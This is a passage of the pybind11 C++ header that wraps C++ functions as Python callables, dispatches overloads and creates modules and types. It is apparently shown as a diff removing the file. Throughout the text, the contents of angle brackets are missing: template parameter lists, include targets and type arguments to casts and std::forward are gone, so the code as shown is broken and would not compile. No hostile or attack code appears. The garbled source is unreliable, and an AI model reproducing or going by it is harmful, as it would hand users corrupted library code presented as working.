Wenzel Jakob - - All rights reserved. Use of this source code is governed by a - BSD-style license that can be found in the LICENSE file. -*/ - -#pragma once - -#if defined(__INTEL_COMPILER) -# pragma warning push -# pragma warning disable 68 // integer conversion resulted in a change of sign -# pragma warning disable 186 // pointless comparison of unsigned integer with zero -# pragma warning disable 878 // incompatible exception specifications -# pragma warning disable 1334 // the "template" keyword used for syntactic disambiguation may only be used within a template -# pragma warning disable 1682 // implicit conversion of a 64-bit integral type to a smaller integral type (potential portability problem) -# pragma warning disable 1786 // function "strdup" was declared deprecated -# pragma warning disable 1875 // offsetof applied to non-POD (Plain Old Data) types is nonstandard -# pragma warning disable 2196 // warning #2196: routine is both "inline" and "noinline" -#elif defined(_MSC_VER) -# pragma warning(push) -# pragma warning(disable: 4100) // warning C4100: Unreferenced formal parameter -# pragma warning(disable: 4127) // warning C4127: Conditional expression is constant -# pragma warning(disable: 4512) // warning C4512: Assignment operator was implicitly defined as deleted -# pragma warning(disable: 4800) // warning C4800: 'int': forcing value to bool 'true' or 'false' (performance warning) -# pragma warning(disable: 4996) // warning C4996: The POSIX name for this item is deprecated. Instead, use the ISO C and C++ conformant name -# pragma warning(disable: 4702) // warning C4702: unreachable code -# pragma warning(disable: 4522) // warning C4522: multiple assignment operators specified -#elif defined(__GNUG__) && !defined(__clang__) -# pragma GCC diagnostic push -# pragma GCC diagnostic ignored "-Wunused-but-set-parameter" -# pragma GCC diagnostic ignored "-Wunused-but-set-variable" -# pragma GCC diagnostic ignored "-Wmissing-field-initializers" -# pragma GCC diagnostic ignored "-Wstrict-aliasing" -# pragma GCC diagnostic ignored "-Wattributes" -# if __GNUC__ >= 7 -# pragma GCC diagnostic ignored "-Wnoexcept-type" -# endif -#endif - -#include "attr.h" -#include "options.h" -#include "detail/class.h" -#include "detail/init.h" - -#if defined(__GNUG__) && !defined(__clang__) -# include -#endif - -PYBIND11_NAMESPACE_BEGIN(PYBIND11_NAMESPACE) - -/// Wraps an arbitrary C++ function/method/lambda function/.. into a callable Python object -class cpp_function : public function { -public: - cpp_function() { } - cpp_function(std::nullptr_t) { } - - /// Construct a cpp_function from a vanilla function pointer - template - cpp_function(Return (*f)(Args...), const Extra&... extra) { - initialize(f, f, extra...); - } - - /// Construct a cpp_function from a lambda function (possibly with internal state) - template ::value>> - cpp_function(Func &&f, const Extra&... extra) { - initialize(std::forward(f), - (detail::function_signature_t *) nullptr, extra...); - } - - /// Construct a cpp_function from a class method (non-const, no ref-qualifier) - template - cpp_function(Return (Class::*f)(Arg...), const Extra&... extra) { - initialize([f](Class *c, Arg... args) -> Return { return (c->*f)(std::forward(args)...); }, - (Return (*) (Class *, Arg...)) nullptr, extra...); - } - - /// Construct a cpp_function from a class method (non-const, lvalue ref-qualifier) - /// A copy of the overload for non-const functions without explicit ref-qualifier - /// but with an added `&`. - template - cpp_function(Return (Class::*f)(Arg...)&, const Extra&... extra) { - initialize([f](Class *c, Arg... args) -> Return { return (c->*f)(args...); }, - (Return (*) (Class *, Arg...)) nullptr, extra...); - } - - /// Construct a cpp_function from a class method (const, no ref-qualifier) - template - cpp_function(Return (Class::*f)(Arg...) const, const Extra&... extra) { - initialize([f](const Class *c, Arg... args) -> Return { return (c->*f)(std::forward(args)...); }, - (Return (*)(const Class *, Arg ...)) nullptr, extra...); - } - - /// Construct a cpp_function from a class method (const, lvalue ref-qualifier) - /// A copy of the overload for const functions without explicit ref-qualifier - /// but with an added `&`. - template - cpp_function(Return (Class::*f)(Arg...) const&, const Extra&... extra) { - initialize([f](const Class *c, Arg... args) -> Return { return (c->*f)(args...); }, - (Return (*)(const Class *, Arg ...)) nullptr, extra...); - } - - /// Return the function name - object name() const { return attr("__name__"); } - -protected: - /// Space optimization: don't inline this frequently instantiated fragment - PYBIND11_NOINLINE detail::function_record *make_function_record() { - return new detail::function_record(); - } - - /// Special internal constructor for functors, lambda functions, etc. - template - void initialize(Func &&f, Return (*)(Args...), const Extra&... extra) { - using namespace detail; - struct capture { remove_reference_t f; }; - - /* Store the function including any extra state it might have (e.g. a lambda capture object) */ - auto rec = make_function_record(); - - /* Store the capture object directly in the function record if there is enough space */ - if (sizeof(capture) <= sizeof(rec->data)) { - /* Without these pragmas, GCC warns that there might not be - enough space to use the placement new operator. However, the - 'if' statement above ensures that this is the case. */ -#if defined(__GNUG__) && !defined(__clang__) && __GNUC__ >= 6 -# pragma GCC diagnostic push -# pragma GCC diagnostic ignored "-Wplacement-new" -#endif - new ((capture *) &rec->data) capture { std::forward(f) }; -#if defined(__GNUG__) && !defined(__clang__) && __GNUC__ >= 6 -# pragma GCC diagnostic pop -#endif - if (!std::is_trivially_destructible::value) - rec->free_data = [](function_record *r) { ((capture *) &r->data)->~capture(); }; - } else { - rec->data[0] = new capture { std::forward(f) }; - rec->free_data = [](function_record *r) { delete ((capture *) r->data[0]); }; - } - - /* Type casters for the function arguments and return value */ - using cast_in = argument_loader; - using cast_out = make_caster< - conditional_t::value, void_type, Return> - >; - - static_assert(expected_num_args(sizeof...(Args), cast_in::has_args, cast_in::has_kwargs), - "The number of argument annotations does not match the number of function arguments"); - - /* Dispatch code which converts function arguments and performs the actual function call */ - rec->impl = [](function_call &call) -> handle { - cast_in args_converter; - - /* Try to cast the function arguments into the C++ domain */ - if (!args_converter.load_args(call)) - return PYBIND11_TRY_NEXT_OVERLOAD; - - /* Invoke call policy pre-call hook */ - process_attributes::precall(call); - - /* Get a pointer to the capture object */ - auto data = (sizeof(capture) <= sizeof(call.func.data) - ? &call.func.data : call.func.data[0]); - capture *cap = const_cast(reinterpret_cast(data)); - - /* Override policy for rvalues -- usually to enforce rvp::move on an rvalue */ - return_value_policy policy = return_value_policy_override::policy(call.func.policy); - - /* Function scope guard -- defaults to the compile-to-nothing `void_type` */ - using Guard = extract_guard_t; - - /* Perform the function call */ - handle result = cast_out::cast( - std::move(args_converter).template call(cap->f), policy, call.parent); - - /* Invoke call policy post-call hook */ - process_attributes::postcall(call, result); - - return result; - }; - - /* Process any user-provided function attributes */ - process_attributes::init(extra..., rec); - - { - constexpr bool has_kwonly_args = any_of...>::value, - has_args = any_of...>::value, - has_arg_annotations = any_of...>::value; - static_assert(has_arg_annotations || !has_kwonly_args, "py::kwonly requires the use of argument annotations"); - static_assert(!(has_args && has_kwonly_args), "py::kwonly cannot be combined with a py::args argument"); - } - - /* Generate a readable signature describing the function's arguments and return value types */ - static constexpr auto signature = _("(") + cast_in::arg_names + _(") -> ") + cast_out::name; - PYBIND11_DESCR_CONSTEXPR auto types = decltype(signature)::types(); - - /* Register the function with Python from generic (non-templated) code */ - initialize_generic(rec, signature.text, types.data(), sizeof...(Args)); - - if (cast_in::has_args) rec->has_args = true; - if (cast_in::has_kwargs) rec->has_kwargs = true; - - /* Stash some additional information used by an important optimization in 'functional.h' */ - using FunctionType = Return (*)(Args...); - constexpr bool is_function_ptr = - std::is_convertible::value && - sizeof(capture) == sizeof(void *); - if (is_function_ptr) { - rec->is_stateless = true; - rec->data[1] = const_cast(reinterpret_cast(&typeid(FunctionType))); - } - } - - /// Register a function call with Python (generic non-templated code goes here) - void initialize_generic(detail::function_record *rec, const char *text, - const std::type_info *const *types, size_t args) { - - /* Create copies of all referenced C-style strings */ - rec->name = strdup(rec->name ? rec->name : ""); - if (rec->doc) rec->doc = strdup(rec->doc); - for (auto &a: rec->args) { - if (a.name) - a.name = strdup(a.name); - if (a.descr) - a.descr = strdup(a.descr); - else if (a.value) - a.descr = strdup(repr(a.value).cast().c_str()); - } - - rec->is_constructor = !strcmp(rec->name, "__init__") || !strcmp(rec->name, "__setstate__"); - -#if !defined(NDEBUG) && !defined(PYBIND11_DISABLE_NEW_STYLE_INIT_WARNING) - if (rec->is_constructor && !rec->is_new_style_constructor) { - const auto class_name = std::string(((PyTypeObject *) rec->scope.ptr())->tp_name); - const auto func_name = std::string(rec->name); - PyErr_WarnEx( - PyExc_FutureWarning, - ("pybind11-bound class '" + class_name + "' is using an old-style " - "placement-new '" + func_name + "' which has been deprecated. See " - "the upgrade guide in pybind11's docs. This message is only visible " - "when compiled in debug mode.").c_str(), 0 - ); - } -#endif - - /* Generate a proper function signature */ - std::string signature; - size_t type_index = 0, arg_index = 0; - for (auto *pc = text; *pc != '\0'; ++pc) { - const auto c = *pc; - - if (c == '{') { - // Write arg name for everything except *args and **kwargs. - if (*(pc + 1) == '*') - continue; - - if (arg_index < rec->args.size() && rec->args[arg_index].name) { - signature += rec->args[arg_index].name; - } else if (arg_index == 0 && rec->is_method) { - signature += "self"; - } else { - signature += "arg" + std::to_string(arg_index - (rec->is_method ? 1 : 0)); - } - signature += ": "; - } else if (c == '}') { - // Write default value if available. - if (arg_index < rec->args.size() && rec->args[arg_index].descr) { - signature += " = "; - signature += rec->args[arg_index].descr; - } - arg_index++; - } else if (c == '%') { - const std::type_info *t = types[type_index++]; - if (!t) - pybind11_fail("Internal error while parsing type signature (1)"); - if (auto tinfo = detail::get_type_info(*t)) { - handle th((PyObject *) tinfo->type); - signature += - th.attr("__module__").cast() + "." + - th.attr("__qualname__").cast(); // Python 3.3+, but we backport it to earlier versions - } else if (rec->is_new_style_constructor && arg_index == 0) { - // A new-style `__init__` takes `self` as `value_and_holder`. - // Rewrite it to the proper class type. - signature += - rec->scope.attr("__module__").cast() + "." + - rec->scope.attr("__qualname__").cast(); - } else { - std::string tname(t->name()); - detail::clean_type_id(tname); - signature += tname; - } - } else { - signature += c; - } - } - if (arg_index != args || types[type_index] != nullptr) - pybind11_fail("Internal error while parsing type signature (2)"); - -#if PY_MAJOR_VERSION < 3 - if (strcmp(rec->name, "__next__") == 0) { - std::free(rec->name); - rec->name = strdup("next"); - } else if (strcmp(rec->name, "__bool__") == 0) { - std::free(rec->name); - rec->name = strdup("__nonzero__"); - } -#endif - rec->signature = strdup(signature.c_str()); - rec->args.shrink_to_fit(); - rec->nargs = (std::uint16_t) args; - - if (rec->sibling && PYBIND11_INSTANCE_METHOD_CHECK(rec->sibling.ptr())) - rec->sibling = PYBIND11_INSTANCE_METHOD_GET_FUNCTION(rec->sibling.ptr()); - - detail::function_record *chain = nullptr, *chain_start = rec; - if (rec->sibling) { - if (PyCFunction_Check(rec->sibling.ptr())) { - auto rec_capsule = reinterpret_borrow(PyCFunction_GET_SELF(rec->sibling.ptr())); - chain = (detail::function_record *) rec_capsule; - /* Never append a method to an overload chain of a parent class; - instead, hide the parent's overloads in this case */ - if (!chain->scope.is(rec->scope)) - chain = nullptr; - } - // Don't trigger for things like the default __init__, which are wrapper_descriptors that we are intentionally replacing - else if (!rec->sibling.is_none() && rec->name[0] != '_') - pybind11_fail("Cannot overload existing non-function object \"" + std::string(rec->name) + - "\" with a function of the same name"); - } - - if (!chain) { - /* No existing overload was found, create a new function object */ - rec->def = new PyMethodDef(); - std::memset(rec->def, 0, sizeof(PyMethodDef)); - rec->def->ml_name = rec->name; - rec->def->ml_meth = reinterpret_cast(reinterpret_cast(*dispatcher)); - rec->def->ml_flags = METH_VARARGS | METH_KEYWORDS; - - capsule rec_capsule(rec, [](void *ptr) { - destruct((detail::function_record *) ptr); - }); - - object scope_module; - if (rec->scope) { - if (hasattr(rec->scope, "__module__")) { - scope_module = rec->scope.attr("__module__"); - } else if (hasattr(rec->scope, "__name__")) { - scope_module = rec->scope.attr("__name__"); - } - } - - m_ptr = PyCFunction_NewEx(rec->def, rec_capsule.ptr(), scope_module.ptr()); - if (!m_ptr) - pybind11_fail("cpp_function::cpp_function(): Could not allocate function object"); - } else { - /* Append at the end of the overload chain */ - m_ptr = rec->sibling.ptr(); - inc_ref(); - chain_start = chain; - if (chain->is_method != rec->is_method) - pybind11_fail("overloading a method with both static and instance methods is not supported; " - #if defined(NDEBUG) - "compile in debug mode for more details" - #else - "error while attempting to bind " + std::string(rec->is_method ? "instance" : "static") + " method " + - std::string(pybind11::str(rec->scope.attr("__name__"))) + "." + std::string(rec->name) + signature - #endif - ); - while (chain->next) - chain = chain->next; - chain->next = rec; - } - - std::string signatures; - int index = 0; - /* Create a nice pydoc rec including all signatures and - docstrings of the functions in the overload chain */ - if (chain && options::show_function_signatures()) { - // First a generic signature - signatures += rec->name; - signatures += "(*args, **kwargs)\n"; - signatures += "Overloaded function.\n\n"; - } - // Then specific overload signatures - bool first_user_def = true; - for (auto it = chain_start; it != nullptr; it = it->next) { - if (options::show_function_signatures()) { - if (index > 0) signatures += "\n"; - if (chain) - signatures += std::to_string(++index) + ". "; - signatures += rec->name; - signatures += it->signature; - signatures += "\n"; - } - if (it->doc && strlen(it->doc) > 0 && options::show_user_defined_docstrings()) { - // If we're appending another docstring, and aren't printing function signatures, we - // need to append a newline first: - if (!options::show_function_signatures()) { - if (first_user_def) first_user_def = false; - else signatures += "\n"; - } - if (options::show_function_signatures()) signatures += "\n"; - signatures += it->doc; - if (options::show_function_signatures()) signatures += "\n"; - } - } - - /* Install docstring */ - PyCFunctionObject *func = (PyCFunctionObject *) m_ptr; - if (func->m_ml->ml_doc) - std::free(const_cast(func->m_ml->ml_doc)); - func->m_ml->ml_doc = strdup(signatures.c_str()); - - if (rec->is_method) { - m_ptr = PYBIND11_INSTANCE_METHOD_NEW(m_ptr, rec->scope.ptr()); - if (!m_ptr) - pybind11_fail("cpp_function::cpp_function(): Could not allocate instance method object"); - Py_DECREF(func); - } - } - - /// When a cpp_function is GCed, release any memory allocated by pybind11 - static void destruct(detail::function_record *rec) { - while (rec) { - detail::function_record *next = rec->next; - if (rec->free_data) - rec->free_data(rec); - std::free((char *) rec->name); - std::free((char *) rec->doc); - std::free((char *) rec->signature); - for (auto &arg: rec->args) { - std::free(const_cast(arg.name)); - std::free(const_cast(arg.descr)); - arg.value.dec_ref(); - } - if (rec->def) { - std::free(const_cast(rec->def->ml_doc)); - delete rec->def; - } - delete rec; - rec = next; - } - } - - /// Main dispatch logic for calls to functions bound using pybind11 - static PyObject *dispatcher(PyObject *self, PyObject *args_in, PyObject *kwargs_in) { - using namespace detail; - - /* Iterator over the list of potentially admissible overloads */ - const function_record *overloads = (function_record *) PyCapsule_GetPointer(self, nullptr), - *it = overloads; - - /* Need to know how many arguments + keyword arguments there are to pick the right overload */ - const size_t n_args_in = (size_t) PyTuple_GET_SIZE(args_in); - - handle parent = n_args_in > 0 ? PyTuple_GET_ITEM(args_in, 0) : nullptr, - result = PYBIND11_TRY_NEXT_OVERLOAD; - - auto self_value_and_holder = value_and_holder(); - if (overloads->is_constructor) { - const auto tinfo = get_type_info((PyTypeObject *) overloads->scope.ptr()); - const auto pi = reinterpret_cast(parent.ptr()); - self_value_and_holder = pi->get_value_and_holder(tinfo, false); - - if (!self_value_and_holder.type || !self_value_and_holder.inst) { - PyErr_SetString(PyExc_TypeError, "__init__(self, ...) called with invalid `self` argument"); - return nullptr; - } - - // If this value is already registered it must mean __init__ is invoked multiple times; - // we really can't support that in C++, so just ignore the second __init__. - if (self_value_and_holder.instance_registered()) - return none().release().ptr(); - } - - try { - // We do this in two passes: in the first pass, we load arguments with `convert=false`; - // in the second, we allow conversion (except for arguments with an explicit - // py::arg().noconvert()). This lets us prefer calls without conversion, with - // conversion as a fallback. - std::vector second_pass; - - // However, if there are no overloads, we can just skip the no-convert pass entirely - const bool overloaded = it != nullptr && it->next != nullptr; - - for (; it != nullptr; it = it->next) { - - /* For each overload: - 1. Copy all positional arguments we were given, also checking to make sure that - named positional arguments weren't *also* specified via kwarg. - 2. If we weren't given enough, try to make up the omitted ones by checking - whether they were provided by a kwarg matching the `py::arg("name")` name. If - so, use it (and remove it from kwargs; if not, see if the function binding - provided a default that we can use. - 3. Ensure that either all keyword arguments were "consumed", or that the function - takes a kwargs argument to accept unconsumed kwargs. - 4. Any positional arguments still left get put into a tuple (for args), and any - leftover kwargs get put into a dict. - 5. Pack everything into a vector; if we have py::args or py::kwargs, they are an - extra tuple or dict at the end of the positional arguments. - 6. Call the function call dispatcher (function_record::impl) - - If one of these fail, move on to the next overload and keep trying until we get a - result other than PYBIND11_TRY_NEXT_OVERLOAD. - */ - - const function_record &func = *it; - size_t num_args = func.nargs; // Number of positional arguments that we need - if (func.has_args) --num_args; // (but don't count py::args - if (func.has_kwargs) --num_args; // or py::kwargs) - size_t pos_args = num_args - func.nargs_kwonly; - - if (!func.has_args && n_args_in > pos_args) - continue; // Too many positional arguments for this overload - - if (n_args_in < pos_args && func.args.size() < pos_args) - continue; // Not enough positional arguments given, and not enough defaults to fill in the blanks - - function_call call(func, parent); - - size_t args_to_copy = (std::min)(pos_args, n_args_in); // Protect std::min with parentheses - size_t args_copied = 0; - - // 0. Inject new-style `self` argument - if (func.is_new_style_constructor) { - // The `value` may have been preallocated by an old-style `__init__` - // if it was a preceding candidate for overload resolution. - if (self_value_and_holder) - self_value_and_holder.type->dealloc(self_value_and_holder); - - call.init_self = PyTuple_GET_ITEM(args_in, 0); - call.args.push_back(reinterpret_cast(&self_value_and_holder)); - call.args_convert.push_back(false); - ++args_copied; - } - - // 1. Copy any position arguments given. - bool bad_arg = false; - for (; args_copied < args_to_copy; ++args_copied) { - const argument_record *arg_rec = args_copied < func.args.size() ? &func.args[args_copied] : nullptr; - if (kwargs_in && arg_rec && arg_rec->name && PyDict_GetItemString(kwargs_in, arg_rec->name)) { - bad_arg = true; - break; - } - - handle arg(PyTuple_GET_ITEM(args_in, args_copied)); - if (arg_rec && !arg_rec->none && arg.is_none()) { - bad_arg = true; - break; - } - call.args.push_back(arg); - call.args_convert.push_back(arg_rec ? arg_rec->convert : true); - } - if (bad_arg) - continue; // Maybe it was meant for another overload (issue #688) - - // We'll need to copy this if we steal some kwargs for defaults - dict kwargs = reinterpret_borrow(kwargs_in); - - // 2. Check kwargs and, failing that, defaults that may help complete the list - if (args_copied < num_args) { - bool copied_kwargs = false; - - for (; args_copied < num_args; ++args_copied) { - const auto &arg = func.args[args_copied]; - - handle value; - if (kwargs_in && arg.name) - value = PyDict_GetItemString(kwargs.ptr(), arg.name); - - if (value) { - // Consume a kwargs value - if (!copied_kwargs) { - kwargs = reinterpret_steal(PyDict_Copy(kwargs.ptr())); - copied_kwargs = true; - } - PyDict_DelItemString(kwargs.ptr(), arg.name); - } else if (arg.value) { - value = arg.value; - } - - if (value) { - call.args.push_back(value); - call.args_convert.push_back(arg.convert); - } - else - break; - } - - if (args_copied < num_args) - continue; // Not enough arguments, defaults, or kwargs to fill the positional arguments - } - - // 3. Check everything was consumed (unless we have a kwargs arg) - if (kwargs && kwargs.size() > 0 && !func.has_kwargs) - continue; // Unconsumed kwargs, but no py::kwargs argument to accept them - - // 4a. If we have a py::args argument, create a new tuple with leftovers - if (func.has_args) { - tuple extra_args; - if (args_to_copy == 0) { - // We didn't copy out any position arguments from the args_in tuple, so we - // can reuse it directly without copying: - extra_args = reinterpret_borrow(args_in); - } else if (args_copied >= n_args_in) { - extra_args = tuple(0); - } else { - size_t args_size = n_args_in - args_copied; - extra_args = tuple(args_size); - for (size_t i = 0; i < args_size; ++i) { - extra_args[i] = PyTuple_GET_ITEM(args_in, args_copied + i); - } - } - call.args.push_back(extra_args); - call.args_convert.push_back(false); - call.args_ref = std::move(extra_args); - } - - // 4b. If we have a py::kwargs, pass on any remaining kwargs - if (func.has_kwargs) { - if (!kwargs.ptr()) - kwargs = dict(); // If we didn't get one, send an empty one - call.args.push_back(kwargs); - call.args_convert.push_back(false); - call.kwargs_ref = std::move(kwargs); - } - - // 5. Put everything in a vector. Not technically step 5, we've been building it - // in `call.args` all along. - #if !defined(NDEBUG) - if (call.args.size() != func.nargs || call.args_convert.size() != func.nargs) - pybind11_fail("Internal error: function call dispatcher inserted wrong number of arguments!"); - #endif - - std::vector second_pass_convert; - if (overloaded) { - // We're in the first no-convert pass, so swap out the conversion flags for a - // set of all-false flags. If the call fails, we'll swap the flags back in for - // the conversion-allowed call below. - second_pass_convert.resize(func.nargs, false); - call.args_convert.swap(second_pass_convert); - } - - // 6. Call the function. - try { - loader_life_support guard{}; - result = func.impl(call); - } catch (reference_cast_error &) { - result = PYBIND11_TRY_NEXT_OVERLOAD; - } - - if (result.ptr() != PYBIND11_TRY_NEXT_OVERLOAD) - break; - - if (overloaded) { - // The (overloaded) call failed; if the call has at least one argument that - // permits conversion (i.e. it hasn't been explicitly specified `.noconvert()`) - // then add this call to the list of second pass overloads to try. - for (size_t i = func.is_method ? 1 : 0; i < pos_args; i++) { - if (second_pass_convert[i]) { - // Found one: swap the converting flags back in and store the call for - // the second pass. - call.args_convert.swap(second_pass_convert); - second_pass.push_back(std::move(call)); - break; - } - } - } - } - - if (overloaded && !second_pass.empty() && result.ptr() == PYBIND11_TRY_NEXT_OVERLOAD) { - // The no-conversion pass finished without success, try again with conversion allowed - for (auto &call : second_pass) { - try { - loader_life_support guard{}; - result = call.func.impl(call); - } catch (reference_cast_error &) { - result = PYBIND11_TRY_NEXT_OVERLOAD; - } - - if (result.ptr() != PYBIND11_TRY_NEXT_OVERLOAD) { - // The error reporting logic below expects 'it' to be valid, as it would be - // if we'd encountered this failure in the first-pass loop. - if (!result) - it = &call.func; - break; - } - } - } - } catch (error_already_set &e) { - e.restore(); - return nullptr; -#if defined(__GNUG__) && !defined(__clang__) - } catch ( abi::__forced_unwind& ) { - throw; -#endif - } catch (...) { - /* When an exception is caught, give each registered exception - translator a chance to translate it to a Python exception - in reverse order of registration. - - A translator may choose to do one of the following: - - - catch the exception and call PyErr_SetString or PyErr_SetObject - to set a standard (or custom) Python exception, or - - do nothing and let the exception fall through to the next translator, or - - delegate translation to the next translator by throwing a new type of exception. */ - - auto last_exception = std::current_exception(); - auto ®istered_exception_translators = get_internals().registered_exception_translators; - for (auto& translator : registered_exception_translators) { - try { - translator(last_exception); - } catch (...) { - last_exception = std::current_exception(); - continue; - } - return nullptr; - } - PyErr_SetString(PyExc_SystemError, "Exception escaped from default exception translator!"); - return nullptr; - } - - auto append_note_if_missing_header_is_suspected = [](std::string &msg) { - if (msg.find("std::") != std::string::npos) { - msg += "\n\n" - "Did you forget to `#include `? Or ,\n" - ", , etc. Some automatic\n" - "conversions are optional and require extra headers to be included\n" - "when compiling your pybind11 module."; - } - }; - - if (result.ptr() == PYBIND11_TRY_NEXT_OVERLOAD) { - if (overloads->is_operator) - return handle(Py_NotImplemented).inc_ref().ptr(); - - std::string msg = std::string(overloads->name) + "(): incompatible " + - std::string(overloads->is_constructor ? "constructor" : "function") + - " arguments. The following argument types are supported:\n"; - - int ctr = 0; - for (const function_record *it2 = overloads; it2 != nullptr; it2 = it2->next) { - msg += " "+ std::to_string(++ctr) + ". "; - - bool wrote_sig = false; - if (overloads->is_constructor) { - // For a constructor, rewrite `(self: Object, arg0, ...) -> NoneType` as `Object(arg0, ...)` - std::string sig = it2->signature; - size_t start = sig.find('(') + 7; // skip "(self: " - if (start < sig.size()) { - // End at the , for the next argument - size_t end = sig.find(", "), next = end + 2; - size_t ret = sig.rfind(" -> "); - // Or the ), if there is no comma: - if (end >= sig.size()) next = end = sig.find(')'); - if (start < end && next < sig.size()) { - msg.append(sig, start, end - start); - msg += '('; - msg.append(sig, next, ret - next); - wrote_sig = true; - } - } - } - if (!wrote_sig) msg += it2->signature; - - msg += "\n"; - } - msg += "\nInvoked with: "; - auto args_ = reinterpret_borrow(args_in); - bool some_args = false; - for (size_t ti = overloads->is_constructor ? 1 : 0; ti < args_.size(); ++ti) { - if (!some_args) some_args = true; - else msg += ", "; - try { - msg += pybind11::repr(args_[ti]); - } catch (const error_already_set&) { - msg += ""; - } - } - if (kwargs_in) { - auto kwargs = reinterpret_borrow(kwargs_in); - if (kwargs.size() > 0) { - if (some_args) msg += "; "; - msg += "kwargs: "; - bool first = true; - for (auto kwarg : kwargs) { - if (first) first = false; - else msg += ", "; - msg += pybind11::str("{}=").format(kwarg.first); - try { - msg += pybind11::repr(kwarg.second); - } catch (const error_already_set&) { - msg += ""; - } - } - } - } - - append_note_if_missing_header_is_suspected(msg); - PyErr_SetString(PyExc_TypeError, msg.c_str()); - return nullptr; - } else if (!result) { - std::string msg = "Unable to convert function return value to a " - "Python type! The signature was\n\t"; - msg += it->signature; - append_note_if_missing_header_is_suspected(msg); - PyErr_SetString(PyExc_TypeError, msg.c_str()); - return nullptr; - } else { - if (overloads->is_constructor && !self_value_and_holder.holder_constructed()) { - auto *pi = reinterpret_cast(parent.ptr()); - self_value_and_holder.type->init_instance(pi, nullptr); - } - return result.ptr(); - } - } -}; - -/// Wrapper for Python extension modules -class module : public object { -public: - PYBIND11_OBJECT_DEFAULT(module, object, PyModule_Check) - - /// Create a new top-level Python module with the given name and docstring - explicit module(const char *name, const char *doc = nullptr) { - if (!options::show_user_defined_docstrings()) doc = nullptr; -#if PY_MAJOR_VERSION >= 3 - PyModuleDef *def = new PyModuleDef(); - std::memset(def, 0, sizeof(PyModuleDef)); - def->m_name = name; - def->m_doc = doc; - def->m_size = -1; - Py_INCREF(def); - m_ptr = PyModule_Create(def); -#else - m_ptr = Py_InitModule3(name, nullptr, doc); -#endif - if (m_ptr == nullptr) - pybind11_fail("Internal error in module::module()"); - inc_ref(); - } - - /** \rst - Create Python binding for a new function within the module scope. ``Func`` - can be a plain C++ function, a function pointer, or a lambda function. For - details on the ``Extra&& ... extra`` argument, see section :ref:`extras`. - \endrst */ - template - module &def(const char *name_, Func &&f, const Extra& ... extra) { - cpp_function func(std::forward(f), name(name_), scope(*this), - sibling(getattr(*this, name_, none())), extra...); - // NB: allow overwriting here because cpp_function sets up a chain with the intention of - // overwriting (and has already checked internally that it isn't overwriting non-functions). - add_object(name_, func, true /* overwrite */); - return *this; - } - - /** \rst - Create and return a new Python submodule with the given name and docstring. - This also works recursively, i.e. - - .. code-block:: cpp - - py::module m("example", "pybind11 example plugin"); - py::module m2 = m.def_submodule("sub", "A submodule of 'example'"); - py::module m3 = m2.def_submodule("subsub", "A submodule of 'example.sub'"); - \endrst */ - module def_submodule(const char *name, const char *doc = nullptr) { - std::string full_name = std::string(PyModule_GetName(m_ptr)) - + std::string(".") + std::string(name); - auto result = reinterpret_borrow(PyImport_AddModule(full_name.c_str())); - if (doc && options::show_user_defined_docstrings()) - result.attr("__doc__") = pybind11::str(doc); - attr(name) = result; - return result; - } - - /// Import and return a module or throws `error_already_set`. - static module import(const char *name) { - PyObject *obj = PyImport_ImportModule(name); - if (!obj) - throw error_already_set(); - return reinterpret_steal(obj); - } - - /// Reload the module or throws `error_already_set`. - void reload() { - PyObject *obj = PyImport_ReloadModule(ptr()); - if (!obj) - throw error_already_set(); - *this = reinterpret_steal(obj); - } - - // Adds an object to the module using the given name. Throws if an object with the given name - // already exists. - // - // overwrite should almost always be false: attempting to overwrite objects that pybind11 has - // established will, in most cases, break things. - PYBIND11_NOINLINE void add_object(const char *name, handle obj, bool overwrite = false) { - if (!overwrite && hasattr(*this, name)) - pybind11_fail("Error during initialization: multiple incompatible definitions with name \"" + - std::string(name) + "\""); - - PyModule_AddObject(ptr(), name, obj.inc_ref().ptr() /* steals a reference */); - } -}; - -/// \ingroup python_builtins -/// Return a dictionary representing the global variables in the current execution frame, -/// or ``__main__.__dict__`` if there is no frame (usually when the interpreter is embedded). -inline dict globals() { - PyObject *p = PyEval_GetGlobals(); - return reinterpret_borrow(p ? p : module::import("__main__").attr("__dict__").ptr()); -} - -PYBIND11_NAMESPACE_BEGIN(detail) -/// Generic support for creating new Python heap types -class generic_type : public object { - template friend class class_; -public: - PYBIND11_OBJECT_DEFAULT(generic_type, object, PyType_Check) -protected: - void initialize(const type_record &rec) { - if (rec.scope && hasattr(rec.scope, rec.name)) - pybind11_fail("generic_type: cannot initialize type \"" + std::string(rec.name) + - "\": an object with that name is already defined"); - - if (rec.module_local ? get_local_type_info(*rec.type) : get_global_type_info(*rec.type)) - pybind11_fail("generic_type: type \"" + std::string(rec.name) + - "\" is already registered!"); - - m_ptr = make_new_python_type(rec); - - /* Register supplemental type information in C++ dict */ - auto *tinfo = new detail::type_info(); - tinfo->type = (PyTypeObject *) m_ptr; - tinfo->cpptype = rec.type; - tinfo->type_size = rec.type_size; - tinfo->type_align = rec.type_align; - tinfo->operator_new = rec.operator_new; - tinfo->holder_size_in_ptrs = size_in_ptrs(rec.holder_size); - tinfo->init_instance = rec.init_instance; - tinfo->dealloc = rec.dealloc; - tinfo->simple_type = true; - tinfo->simple_ancestors = true; - tinfo->default_holder = rec.default_holder; - tinfo->module_local = rec.module_local; - - auto &internals = get_internals(); - auto tindex = std::type_index(*rec.type); - tinfo->direct_conversions = &internals.direct_conversions[tindex]; - if (rec.module_local) - registered_local_types_cpp()[tindex] = tinfo; - else - internals.registered_types_cpp[tindex] = tinfo; - internals.registered_types_py[(PyTypeObject *) m_ptr] = { tinfo }; - - if (rec.bases.size() > 1 || rec.multiple_inheritance) { - mark_parents_nonsimple(tinfo->type); - tinfo->simple_ancestors = false; - } - else if (rec.bases.size() == 1) { - auto parent_tinfo = get_type_info((PyTypeObject *) rec.bases[0].ptr()); - tinfo->simple_ancestors = parent_tinfo->simple_ancestors; - } - - if (rec.module_local) { - // Stash the local typeinfo and loader so that external modules can access it. - tinfo->module_local_load = &type_caster_generic::local_load; - setattr(m_ptr, PYBIND11_MODULE_LOCAL_ID, capsule(tinfo)); - } - } - - /// Helper function which tags all parents of a type using mult. inheritance - void mark_parents_nonsimple(PyTypeObject *value) { - auto t = reinterpret_borrow(value->tp_bases); - for (handle h : t) { - auto tinfo2 = get_type_info((PyTypeObject *) h.ptr()); - if (tinfo2) - tinfo2->simple_type = false; - mark_parents_nonsimple((PyTypeObject *) h.ptr()); - } - } - - void install_buffer_funcs( - buffer_info *(*get_buffer)(PyObject *, void *), - void *get_buffer_data) { - PyHeapTypeObject *type = (PyHeapTypeObject*) m_ptr; - auto tinfo = detail::get_type_info(&type->ht_type); - - if 